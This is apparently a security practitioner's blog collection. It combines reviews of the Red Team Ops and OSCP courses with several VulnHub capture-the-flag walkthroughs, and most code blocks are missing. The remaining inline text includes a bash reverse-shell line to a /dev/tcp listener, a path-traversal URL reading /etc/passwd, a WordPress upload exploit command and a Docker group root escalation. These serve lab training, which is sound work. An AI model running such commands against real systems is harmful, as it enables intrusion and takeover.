RTO consists of the course materials, which are hosted on an online learning platform, and the labs, with users, servers, and a total of 3 domains. The materials are structured in such a way that you go more or less in order to complete the objectives. The explanations and examples are clear and concise, giving you enough for the task at hand. I liked the no fluff approach, and I also recognized that you can get a lot more out of the course if you research deeper into some topics to gain a better understanding of what’s going on.
The course mirrors a red team engagement where the objective is not to pwn all the things but to compromise a target organization and exfiltrate important data. You start from the outside with minimal information and you have to go through recon, OSINT and phishing to get a foothold on the internal network. Then you get to use the taught techniques for privilege escalation, lateral movement, domain compromise and evading defenses, as well as maintaining persistence in the environment. Don’t expect to use exploits on this course. Rather, you have to exploit typical Windows and Active Directory misconfigurations to accomplish your objectives. A lot of AD attacks are covered, as well as different tradecraft for various scenarios.
At the beginning the course used only Covenant as the C2 framework of choice, but with the continous updates now it also shows how to accomplish the objectives with Cobalt Strike. I learned a lot from using Covenant, even though at times its bugs drove me crazy. The course was initially created for Covenant 0.4, but since the 0.5 release, it got updates to reflect that. Covenant is really powerful for such a new framework, but at the same time is not as feature rich as older frameworks, so the course shows you ways to use other tools to augment the Covenant usage when necessary. In particular, I really learned a ton for using Metasploit for SOCKS proxies and reverse port forwards.
There is heavy emphasis on .NET tradecraft in the course, which is really nice considering that it’s the current MO of choice for offensive operations. However, there is plenty of Powershell usage as well, so expect a well-rounded tradecraft experience. You don’t just use tools all the time, sometimes you get to slightly modify code and compile tools and implants (called grunts in Covenant) to achieve the desired end state. All in all, the labs are spot on in terms of current tradecraft usage. There is a nice gamification effect as well. Throughout the labs you have to complete certain objectives by using specific attacks, so you can’t skip content.
The exam is a beast on its own. You have 48 hours to collect 4 flags, and the passing score is 3 flags. You don’t have to write a report. In the exam you will have to combine everything you learned and be really comfortable with the techniques and bypasses, ideally also how to achieve the same thing in different ways. It’s a fun and difficult exam where you will switch from despair to joy and so on.
There are a couple other things that make an excellent course even greater, and that I haven’t really seen with other courses, which I will list below.
Continuous updates. RastaMouse was true to his word that this course would receive regular updates. A number of sections were added, or more explanations and examples were added for specific sections, as well as rewriting the Covenant usage to reflect the changes from 0.4 to 0.5 and adding the Cobalt Strike examples to show how the same thing can be done with CS instead of Covenant.
Lifetime access. Combined with the above, it’s really amazing. Once you buy the course, you get lifetime access to the materials, including the updates, so you can always go back and absorb the newly added material. You also have a different channel for buying lab extensions than the new purchases, with more custom lab time than the initial 1, 2, or 3 month duration.
Fantastic support and community. The support offered in this course is exceptional. RastaMouse is super fast to help with any issues or to offer guidance on the dedicated Slack channel. And the channel is a perfect place to discuss with other students and learn from others, so it’s definitely recommended to hang around!
Course format. There are 2 ways to get the Certified Red Team Operator certification. The external one is by having the OSCP and passing the RTO exam. The internal way, which I strongly recommend, is to achieve all the course objectives (you are granted a badge for each completed objective) and pass the RTO exam. The badge format is a nice motivator, as well as keeping your progress visualized and ensuring you don’t skip tasks.
As a conclusion, Red Team Ops was a fantasting learning experience for me and thanks to RastaMouse for creating it!
1 2 3 4 5 6 7 8 |
|
A quick rundown of my experience, I did all the lab machines and all the exam machines within 3 months. I plan to go back and also do the ones that were added by the update, but right now I am too busy with other things. After I do that, maybe I’ll update this post or write a new one more focused on the impressions of the update. In terms of the new course materials, which I did review, there’s a lot compared to the previous version. In particular, the new Windows section is superb and there are lots of usable snippets for various scenarios in modern environments.
Back to the reason for this post, it’s not that I want to add just another post with what I did to prepare and the kind of information that is widely available already through the experiences of so many other successful takers (and you should read those posts and learn the most out of them to help you with your journey). My reason is that I noticed many people consider the OSCP the end all, be all of pentesting and are under the impression that it automatically makes you a pentesting god, while there are others who think it’s overrated and that you don’t learn much out of it. I consider both these opinion categories wrong. Let’s dive in.
After doing the OSCP and also moving beyond it, I consider it more like a necessary qualification to go through as a baseline for pentesting, much like the bootcamp in an army, training camp of a fight, or the qualifiers to a World Cup. It’s hard and diverse enough, but it doesn’t cover everything. It’s mostly focused on network and web exploitation, along with enumeration and privilege escalation. Achieving it will demonstrate perseverance in front of obstacles, a working pentest methodology and skill, and a reasonable level of experience performing it. From that point, there’s a lot on the horizon..going deeper in network and web attacks, exploit development, Active Directory..you realize when you’re done that you just passed through a warpgate and now there’s a whole lot of new challenges lining up. But the principles you learned through completing it will continue to be usable in your career and in future challenges.
I’ve heard of several people who jumped into the exam after only going through a few machines in the labs. You are literally robbing yourself of the most valuable thing the OSCP provides. All the lab machines present a wide variety of operating systems (not just the usual flavors of Windows and Linux) and attack vectors. Some machines have different and unique vectors hidden in the attack surface that are way more rewarding than the obvious one. I don’t think I used the same exploit more than 2 times in the lab. Each machine was a learning experience by itself. If you’re running exploit suggester and throwing kernel exploits until one works, you’re doing it wrong. Also, the hidden networks present a new challenge, in the way of pivoting, that needs to be solved before even reaching the targets. Not to mention the client side attacks and their difficulties.
Too many people are focusing just on the finality of earning a certification instead of squeezing the most out of all the labs have to offer. And even after you complete every box, don’t imagine the exam won’t be difficult. But you will be as prepared as you can get. Plus it’s fun! If you don’t get excited about the prospect of pwning over 50 boxes, why are you doing it in the first place? Your ROI will come from the effort you put into the labs, not from the letters you put on your resume.
Another thing I’ve heard often is the complaint about lab machines being too outdated. Yes, the majority of boxes have older OS flavors..and that’s a good thing! You can try your hand at exploits that will teach you things that you wouldn’t otherwise experience in a completely modern environment. This is the foundation you are building, the training you’re doing for match day. Plus, you learn to achieve objectives without your favorite tools. How do you transfer files to and from an older Windows machine without Powershell and all other native tools that you’re used to? What can you do if you have RCE on a NIX system that’s different than the ones you’re familiar with? And many more wins that you arrive at from struggling with each challenge you’re presented.
Even with the new course update, which gives you a better starting point than before, I don’t believe OSCP should be pursued for beginners. People who want to start in pentesting should first make sure they have their basics covered. Things like networking, system administration on Windows and Linux, programming, they are not basics as in easy and simple things, but as in the necessary foundation to add to with security. Trying to skip them won’t end well. Once that is covered, there are lots of resources to prepare you, which I won’t touch on here. VulnHub, HackTheBox, Ippsec, they have enough content to keep you busy for years. At some point, you have to dive in, but properly preparing for OSCP is as important an effort as working through it.
It’s hard and it’s fun. Don’t think just because you finished all the lab machines it will be a walk in the park – it won’t ;). But I do believe that doing all the machines is the best way to gauge your readiness for it.
Keeping it short and to the point I intended, these are my thoughts about the OSCP. It’s an awesome training experience and challenge. You constantly switch back and forth between frustration and elation. And once you’re on the other side..you don’t stop there, but you go forward exploring all that new fog of war.
1 2 3 4 5 6 7 8 9 |
|
The start is atypical..the machine only has the SSH port open, and in the author description we are told to start:here
for the login..so let’s try to SSH with these credentials. It works and we are in right away.
1 2 |
|
If you take the bluepill, you are being taught the secrets of how to make a hacker waste time.
1 2 |
|
With the redpill, we find a password..or we’re being trolled:
1 2 |
|
Jumping straight into enumeration with LinEnum, we notice there are many potentially interesting users on the system:
1 2 3 4 |
|
When searching for world writable files, we find the following:
1 2 3 |
|
We also find possible credentials for the eagle user among the files owned by the start user:
1 2 |
|
I transferred the capture file to my machine, also checked the contents of that troll file, it was filled with blocks of strings like these:
1 2 3 |
|
Before looking at the exfiltrated file, I switched to the user eagle with the above password.
The packet capture file contains wireless traffic, so I thought about cracking it with aircrack-ng. For the first attempt, I fed it the gold_star.txt file as wordlist, and it found the passphrase in 5 minutes:
1 2 3 |
|
There was nothing particularly interesting from eagle’s point of view, other than the sudo privilege for starting the vsftpd service:
1 2 |
|
We keep this option on the bench for now, since we have something else to work with. We know there’s a wytshadow user, and the .cap file had the same name, so I used the key as password for this account and new user, new shell!
Inside the home directory we find a SUID executable:
1 2 3 |
|
If we run it, we see the string “iM Cr@zY L1k3 AAA LYNX” printed continuously on the screen. If we look in the strings of the file, we see a reference to a shell script:
1
|
|
If we look at that file, we see it does exactly what we saw earlier, printing the string in an infinite loop:
1 2 3 |
|
We don’t have permissions to further enumerate the /lol directory. I checked the sudo privileges, and this user can start an Nginx server:
1 2 |
|
The server is listening on port 8080, but we get a 403 Forbidden error when trying to access it.
1 2 |
|
If we look in the Nginx configuration files, we find the server expects a user agent of Lynx, and now it all makes sense. Lynx is a CLI browser.
1 2 3 |
|
I already had it on Kali, so I used it to browse to the newly opened web server and was handed the credentials for the genphlux user:
1 2 |
|
Inside the home directory we immediately find the SSH private key of the maleus user!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
|
I was curious about what was inside /lol, it appears to be a JBoss installation:
1 2 |
|
genphlux can also start an Apache server:
1 2 |
|
I started the server, also getting a 403 Forbidden, lynx or not. Moving on for now, I SSH’ed in as maleus with the found private key.
Inside his home we find another binary:
1 2 |
|
This binary asks for a password:
1 2 3 4 5 6 |
|
And in the strings we find a message for finding the correct password probably:
1
|
|
This reward isn’t really that enticing, so I didn’t jump into reversing this, it might be a troll dead end. I continued looking through the home folder and found a possible password inside the .viminfo file:
1 2 3 4 5 6 7 |
|
In the .viminfo file you can find information that persists throughout vim runs. If you don’t disable the vim logging, you can expect to find things you typed / pasted / edited, like passwords in this case. A useful blog that describes this in more detail is http://technotes.whw1.com/computer-related/development/programming/58-how-to-stop-vim-logging-info-into-viminfo
The password belongs to maleus and now we can check his sudo privileges. We find out he can run the executable from earlier as root:
1 2 |
|
From the strings, we already assume the executable itself is just a troll. However, maleus has write privileges over this file:
1 2 3 |
|
So we can just replace this useless binary with one that would give us a root shell:
1 2 3 4 5 6 7 8 9 10 11 |
|
This was another fun machine in the series. In the end, we trolled the troll again!
1 2 3 4 5 6 7 8 9 10 |
|
There are quite a few ports open, and some filtered:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
|
The available web server is a Tomcat installation. In the http://192.168.159.137:8080/tryharder/tryharder we find a base64 string:
1
|
|
Decoding this hints at insecure passwords:
1 2 3 4 5 |
|
From all the other services, the one that seems most likely to be bruteforced is Samba. So let’s have a look:
1 2 3 4 5 6 7 8 9 |
|
The qiu share is what we want to look at. Running enum4linux we find 2 accounts:
1 2 3 4 5 |
|
Following the hint, I tried the share with a password of password and it worked for user qiu:
1 2 3 4 5 6 7 8 9 10 11 12 13 |
|
I mounted the share locally for easier browsing with mount -t cifs //192.168.159.137/qiu /mnt/ctf -o username=qiu -o password=password
. Then I started looking through what we have. The .bash_history file shows us the last commands entered by user qiu:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
|
The .public folder contains a message that doesn’t seem relevant but is sound advice!
1 2 |
|
We have more to check inside .private:
1 2 |
|
Readme contents are:
1
|
|
The secrets folder is empty. Inside opensesame there’s a config file that contains port knocking instructions for opening HTTP and SSH:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
|
I used a quick Bash one-liner for the port knocking:
1
|
|
Now port 80 was opened and we find a message stating that: “This machine shall make you plead for mercy! Bwahahahahaha!”. In the robots.txt file we find 2 entries:
1 2 |
|
Inside /mercy there’s an index file that hints at possible RCE:
1 2 3 |
|
Inside /nomercy there’s a RIPS installation. RIPS is a PHP static scanner that looks for vulnerabilities in the source code.
The version 0.53 is vulnerable to a LFI exploit. Going to http://192.168.159.137/nomercy/windows/code.php?file=../../../../../../etc/passwd gives us the contents of the passwd file. Here are the last 4 users:
1 2 3 4 |
|
With this LFI, we can take a look at the /etc/tomcat7/tomcat-users.xml
to search for credentials:
1 2 3 4 |
|
We can now login to Tomcat and upload a reverse shell. I used a nice tool called tomcatWarDeployer that automatically generates and deploys a JSP backdoor.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 |
|
All I had to do was provide the credentials and the host/port combination. The host specified by the -H flag is where I’m expecting the shell:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
|
Unfortunately, I found this shell too unstable, so I switched to Metasploit and spawned a Meterpreter shell:
1 2 3 4 5 6 7 8 9 10 11 |
|
I dropped into a shell and upgraded it to a proper terminal with python -c ‘import pty; pty.spawn(“/bin/bash”)’
. From this shell, I was able to switch to user fluffy with the previously found password of freakishfluffybunny
.
1 2 3 4 5 6 7 8 9 10 |
|
There are a few interesting files in fluffy’s home:
1 2 3 |
|
The backup.save file is a shell script that just outputs a text:
1 2 3 4 |
|
In .secrets we have a Try harder! message. And the timeclock outputs the current date and time inside the web folder:
1 2 3 4 5 6 7 8 |
|
This should be the local time reference from earlier. What’s more interesting, this script is owned by root and everyone has full permissions on it:
1
|
|
I appended a bash one-liner to the script to send me a shell: bash -i >& /dev/tcp/192.168.159.129/8888 0>&1
. But if we just run the script, the shell will still be with fluffy’s privileges. There should be a cron or something run by root. As I was investigating, I received a root shell on my listener!
1 2 3 4 5 6 7 8 |
|
Indeed, cron was running the timeclock script every 3 minutes:
1
|
|
And the final flag and a message from the author:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
|
This was a nice box, the RIPS vector was definitely an interesting touch!
1 2 3 4 5 6 7 8 9 |
|
Remember TCP is not the only protocol on the Internet My challenges are never finished with root. I make you work for the flags. The intended route is NOT to use forensics or 0-days, I will not complain either way.
To consider this VM complete, you need to have obtained:
Troll Flag: where you normally look for them
Flag 1: You have it when you book Jennifer tickets to Paris on Pan Am.
Flag 2: It will include a final challenge to confirm you hit the jackpot.
Have root everywhere (this will make sense once you’re in the VM)
User passwords
2 VNC passwords
Best of luck! If you get stuck, eat some EXTRABACON
NB: Please allow 5-10 minutes or so from powering on the VM for background tasks to run before proceeding to attack.
For the recon part, today I’ll be using Reconnoitre
A reconnaissance tool made for the OSCP labs to automate information gathering and service enumeration whilst creating a directory structure to store results, findings and exploits used for > each host, recommended commands to execute and directory structures for storing loot and flags.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
|
I ran reconnoitre and it created a directory structure with multiple files:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
|
The files contain the commands that were run and the output, along with recommendations. The scans revealed that SSH and SNMP are open on the box:
1 2 3 4 5 6 7 8 9 10 11 12 |
|
Next I enumerated the SNMP information:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
|
We have a possible user account called eric. I googled the line about New Orleans and found it’s from a song:
There is a house in New Orleans They call the rising sun
The credentials eric/therisingsun
worked for SSH. In the home directory I found a funny image that may be useful for something later:
I ran LinEnum on the box and noticed some VMs running on it:
1 2 3 4 5 |
|
The OS running is Ubuntu 14.04.5 LTS, so it’s vulnerable to the overlayfs exploit. With it, I got root easily, and read the first flag:
1 2 3 4 5 6 7 |
|
Ok, we have root, but this is only the beginning. We know that we should find 2 VNC passwords, and they are probably for the 2 VMs we identified earlier. I confirmed it:
1 2 |
|
I searched for the VM configuration files, they were located in /etc/libvirt/qemu
:
1 2 |
|
I read the files and found the password for barringsbank is memphistennessee
, while the password for puppet is sendyoubacktowalker
. Since nc was installed on the box, I used it to port scan the VMs. They didn’t have 5900 port open, but they did have SSH listening:
1 2 3 4 |
|
I tried to SSH on the puppet VM first, to see if I can get any info, and the banner did not disappoint:
1 2 3 4 5 |
|
We found out there’s a sandieshaw user and got a hint for the password. After a little Googling, I learned that one of Sandie Shaw’s most famous songs is Puppet on a String..and this suits the VM, so I removed the spaces and tried lowercase first, and got in with sandieshaw/puppetonastring
.
This seems to be a Puppet-centric machine. Puppet is a tool for automating infrastructure and software configuration management. You can learn more from https://puppet.com/
Back to the machine, I checked that Puppet is running:
1 2 3 4 |
|
Then I looked inside puppet’s config directory, in /etc/puppet, and I found lots of configuration files for the barringsbank VM inside modules/vulnhub/files/
:
1 2 3 |
|
In the barringsbank-passwd file, I found the user list, the interesting one to keep in mind is:
1
|
|
Continuing with the information gathering, the barringsbank-sshd_config reveals that public key authentication is used for SSH on the VM.
Inside manifests there’s a module called init.pp that removes from the system the useful command line utilities lice nmap, ncaat, etc. and reverses changes to key system files. It’s pretty funny and contains references to various Vulnhub users.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 |
|
Inside the fiveeights module there’s another file referencing the contents of SSH authorized keys for the nleeson user:
1 2 3 4 5 6 7 8 9 |
|
Another interesting module is the wiggle one, that references a binary called spin that needs to be present in /tmp, and when puppet runs it will change its ownership to root and make it SUID:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
|
This module looks like the way in for privilege escalation. You can find the spin binary and its source code inside /etc/puppet/modules/wiggle/files, it just spins the cursor and outputs a character out of a list. Not too useful, but our sandieshaw user is the owner and has write permissions over it:
1 2 3 4 |
|
In order to exploit this, I created a malicious spin executable with a SUID shell:
1 2 3 4 5 6 7 8 9 |
|
Then I copied it to the box:
1
|
|
Next I transferred it to the puppet VM:
1 2 3 |
|
The next time the puppet agent runs, it puts the malicious spin binary in /tmp and makes it SUID root:
1 2 3 |
|
We are now able to become root:
1 2 3 |
|
Inside /root/protovision we find some files and a hidden directory:
1 2 3 4 5 6 7 8 |
|
Checking the flag first:
1 2 |
|
This hex string is decoded to a revere base64 string:
1
|
|
I reversed it and decoded it for this hint:
1
|
|
Watching the clip, the interesting line is the shouted “Backdoors are not secrets”. This is confirmed by the jim and melvin files:
1 2 3 4 |
|
Inside the hidden folder we find a picture and another hidden folder:
1 2 |
|
The picture states that Barings Bank goes bust. The hidden folder goes on with another and another so I enumerated all:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
|
All the way down, we find 2 files:
1 2 |
|
Let’s see what we have here:
1 2 |
|
Might be a password for something later. The other file is related to the nleeson user we found on the other VM a while ago. I tried to decrypt it with the password secrets, but it didn’t work. But the hint in the jim file was referring to a secret, so I tried secret
and it decrypted a private SSH key for nleeson:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 |
|
I extracted the private key and used it to SSH to the other VM as nleeson. It asked for a passphrase, and I used joshua from the file:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
|
Inside nleeson’s home there’s nothing interesting. I found another reticulatingsplines picture like in eric’s home. There wasn’t anything exploitable around, but we know that Puppet is pushing configuration changes from the puppet VM. With my root privileges in that VM, I edited the nodes.pp and site.pp files in /etc/puppet/manifests
to include the wiggle module on barringsbank as well:
1 2 3 |
|
If you’re wondering how long you have to wait for Puppet changes to propagate over the nodes, there’s a cron job that runs every 10 minutes:
1 2 |
|
Nothing’s stopping us from running the agent though. Whichever way you choose, the spin binary will now appear in /tmp on barringsbank, and that’s another root:
Inside /root there’s an image owned by nleeson that I transferred all the way back to my machine:
1
|
|
Checking for embedded data on the image, we’re being asked for a passphrase. I’ve used all the hints, tried extrabacon as well..but remember the 2 cow pictures called reticulatingsplines found on 2 separate machines. Trying that as the passphrase worked:
1 2 3 4 5 6 7 8 9 10 |
|
I then extracted the file:
1 2 3 |
|
A big hex string that gets decoded to another reversed Base64 string. I used the CLI to decode the flag:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 |
|
This was another excellent machine by Knightmare! Using puppet for exploitation was a new and exciting way to pwn the box.
1 2 3 4 5 6 7 8 9 |
|
Mr. Derp and Uncle Stinky are two system administrators who are starting their own company, DerpNStink. Instead of hiring qualified professionals to build up their IT landscape, they decided to hack together their own system which is almost ready to go live…
1 2 3 4 5 6 7 8 9 10 11 12 13 |
|
Not too many ports to play with. No available exploit for the FTP. The web server seems unfinished:
Let’s check the robots.txt entries. The php folder gives a Forbidden error and the temporary one just displays a try harder! message. I ran gobuster on the web server and found a couple more entries. The interesting one was a /weblog folder:
1
|
|
When I hit that in the browser, it gave me a connection error, but for the derpnstink.local domain. So I added that to my /etc/hosts file and then I was able to connect:
This is a Wordpress site, so I ran a Wordpress scanner on it and the interesting findings were:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
|
It seems not much can be done without authentication, so I went to wp-admin and enumerated the username admin as a valid user…and in the process also discovered that the password is admin..derp! Now I could use an exploit for the authenticated arbitrary file upload with python gallery.py -t http://derpnstink.local/weblog/ -f ~/Desktop/php-reverse-shell.php -u admin -p admin
, and you can find the uploaded shell at http://derpnstink.local/weblog//wp-content/uploads/slideshow-gallery/php-reverse-shell.php
From your new shell, if you look inside /var/www/html/weblog/wp-config.php
, you can find the MySQL credentials:
1 2 3 4 5 6 7 8 9 10 11 |
|
Inside /var/www/html/php/info.php
there is a line stating that there’s a PHPMyAdmin interface:
1
|
|
I went to http://derpnstink.local/php/phpmyadmin/ and used the credentials to get in the wordpress database and get 2 users and hashes:
We already know the admin credentials, so I used john and the rockyou.txt wordlist to crack the hash and get the password wedgie57 for user unclestinky. My first move was to try SSH’ing in, but public key authentication was configured. That left the FTP, and I was able to log in with the credentials stinky:wedgie57 (there was no unclestinky user configured on the system)
On the FTP, we find a folder with some files that I downloaded on my machine for a better look: wget -r ftp://derpnstink.local/files —ftp-user=stinky —ftp-password=wedgie57
1 2 3 4 5 6 7 8 9 10 11 12 |
|
Inside network-logs there’s a file that hints at some PCAP analysis:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
|
Inside /files/ssh/ssh/ssh/ssh/ssh/ssh/ssh there’s a private key:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
|
Now we can SSH on the box:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 |
|
Inside Documents there’s the derpissues.pcap file. I ran strings derpissues.pcap | grep pass
on it to get another set of credentials:
1 2 |
|
In the /etc/passwd file we can find a mrderp user, so I tried to SSH and got in. On the Desktop, I found a file with a helpdesk ticket about sudo issues:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 |
|
On the root filesystem, I found an interesting folder called /support with more information about this sudo issue:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
|
Running a sudo -l gives us the sudo commands that mrderp can run:
1 2 |
|
All I had to do at this point was to create a binaries directory, copy the bash executable to something with derpy in the name and run it as sudo:
1 2 3 4 |
|
Only at the end I realized I should have also collected flags, but I was too lazy to return to that, so leaving only the last flag here:
1 2 3 4 5 6 7 8 |
|
1 2 3 4 5 6 7 8 9 |
|
1 2 3 4 5 6 7 8 9 10 11 |
|
Not much to work with, let’s hit the web server first. Nothing interesting on the home page and the contact page d, but going to the about page gives an error that something went wrong.
In the HTML source, I found a comment:
1
|
|
Didn’t find such a path with my enumeration. I fired up Gobuster next:
1 2 3 4 5 6 7 8 9 10 11 12 |
|
Trying those folders gave me 403 errors, so the next thing I did was to enumerate those folders themselves, and got an interesting hit with the /mailer folder:
1 2 3 4 5 6 7 8 9 |
|
Going to /mailer/examples/ reveals a PHPMailer installation. From the Github files, it should also have a VERSION file, so I went to http://192.168.159.132/mailer/VERSION and was rewarded with the version number: 5.2.16. I found a Metasploit exploit:
PHPMailer versions up to and including 5.2.19 are affected by a vulnerability which can be leveraged by an attacker to write a file with partially controlled contents to an arbitrary location through injection of arguments that are passed to the sendmail binary. This module writes a payload to the web root of the webserver before then executing it with an HTTP request. The user running PHPMailer must have write access to the specified WEB_ROOT directory and successful exploitation can take a few minutes.
This one didn’t work for me, so I found another one with searchsploit. To make it work, I had to install requests_toolbelt and delete the banner that was giving an encoding error. Inside the code I changed the IP and port in the payload and added the target URL:
1
|
|
Per the advisory:
To exploit the vulnerability an attacker could target common website components such as contact/feedback forms, registration forms, password email resets and others that send out emails with the help of a vulnerable version of the PHPMailer class.
After finishing the modifications, I ran it:
1 2 3 4 5 |
|
With a listener on, I went to http://192.168.159.132/backdoor and got a reverse shell:
1 2 3 4 5 6 |
|
From the hostname, we seem to be inside a Docker container. In the root directory I found a script:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
|
Interesting, there is a flag available for user smith. I switched to this user and tried the password smith and it worked:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
|
Inside smith’s home we also have a .ssh folder. Inside we have a pair of private-public keys.
1 2 3 4 5 |
|
And the SSH user is orwell. So let’s copy the private key to our machine and try to SSH in as orwell:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 |
|
It worked! In orwell’s home we find another flag:
1 2 3 4 5 6 7 8 9 10 11 12 |
|
Now we seem to be on the Docker host itself. Let’s confirm:
1 2 3 |
|
We can see the container we were in previously. Now, for the next step, I used as reference this blog post about Docker privilege escalation. The highlights are :
If you happen to have gotten access to a user-account on a machine, and that user is a member of the ‘docker’ group, running the following command will give you a root shell: docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
The command you run to perform the privilege escalation fetches my Docker image from the Docker Hub Registry and runs it. The -v parameter that you pass to Docker specifies that you want to create a volume in the Docker instance. The -i and -t parameters put Docker into ‘shell mode’ rather than starting a daemon process.
The instance is set up to mount the root filesystem of the host machine to the instance’s volume, so when the instance starts it immediately loads a chroot into that volume. This effectively gives you root on the machine.
And if we look at the groups that orwell is a part of, we can see that he is indeed a member of the docker group:
1 2 |
|
Let’s look at the available containers now:
1 2 3 |
|
We can create a new container in the background which is based on the donkeydocker one and mount the host filesystem in it:
1 2 |
|
Now we should find the host / contents in the /host directory inside the container. Let’s verify that it was created:
1 2 3 4 |
|
And now we can run a root shell inside the container and read the host flag:
1 2 3 4 5 6 7 8 9 10 11 |
|
Nice Docker twist on this VM! To recap the steps:
1 2 3 4 5 6 7 8 9 10 |
|
This is a vulnerable machine i created for the Hackfest 2016 CTF http://hackfest.ca/
Difficulty : Hard
Tips:
If youre stuck enumerate more! Seriously take each service running on the system and enumerate them more!
Goals: This machine is intended to take a lot of enumeration and understanding of Linux system.
There are 4 flags on this machine 1. Get a shell 2. Get root access 3. There is a post exploitation flag on the box 4. There is something on this box that is different from the others from this series (Quaoar and Sedna) find why its different
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 |
|
The web server greets us with a familiar planet image. In the background, I started some Samba enumeration, but didn’t find anything interesting:
1 2 3 4 5 6 7 8 |
|
I prefer to leave the web server for last when there are more vectors available, so before further poking at it, I also checked the if something is shared via the NFS:
1 2 3 |
|
Let’s see what we have there:
1 2 3 4 5 6 7 8 9 10 11 12 13 |
|
I looked around, but didn’t find anything to continue from, so back to the web server!
Nmap reported lots of entries in the robots.txt file, so let’s have a look:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 |
|
I looked around and the files point to a Exponent Content Management System installation. Trying the login and other pages gives a message that the site is down for maintenance and database is offline. But another potentially interesting find was http://192.168.159.131/tmp/views_c/_0c7aa37c1e5b7386c5d18dba80bb5d3b%5e118e4111302d35936b445390f58fb9f006cda2dd_0.file._maintenance.tpl.php which gives the message “no direct access allowed”.
I looked for exploits for this CMS, but the interesting ones were from older versions. According to the RELEASE.md file, the version here is 2.3.8. I also found that this version should be vulnerable to CVE-2016-7095, but couldn’t find a way to exploit it. Since the VM description emphasized enumeration, I fired up gobuster to see if there’s more I might have missed on the web server:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
|
This is interesting. The first thing I checked was the backups folder.
1 2 3 |
|
Got a Forbidden error when trying to access the ssh creds file, but I was able to download the SimplePHPQuiz one. It contained the files for another application that doesn’t seem to be installed. I did a search for passwords and got a hit:
1 2 3 |
|
Inside db_conn.php I found some database credentials:
1 2 3 4 5 |
|
Moving on. The /cron folder contains a bunch of PHP files that I couldn’t get anything interesting from. The /framework folder was another dead end. But when I went to /zenphoto, I saw that the Zenphoto 1.4.10 installation needed a last step of providing database credentials. It was configured with root@localhost and it got an access denied. In searchsploit I saw a local file inclusion exploit for this version of Zenphoto, so I tried to complete the installation with the previously discovered credentials. It worked and I was then prompted to create an admin user, which I did:
Next I looked at the LFI exploit:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
|
The path didn’t work for me. I kept looking around while logged in as admin and noticed a file upload plugin:
I enabled the elFinder plugin and now I could upload arbitrary files:
With the PHP reverse shell uploaded, all I had to do was to go to it in the /uploaded directory and I got a shell and the first flag:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
|
Remembering the NFS share that didn’t get us anywhere earlier, I checked the /etc/exports file and found something really interesting and good for us:
1
|
|
Not only we had write permissions on the share, which I haven’t tried, but no root squash means that our root user can leave a SUID shell owned by root on the share for our www-data user after we copy it there with our low-privilege shell:
1 2 3 |
|
Now chown to root:
1 2 3 4 |
|
Execute the binary and you have root on the box and the 2nd flag:
1 2 3 4 5 6 |
|
I didn’t poke around for more flags, so this is for this box!
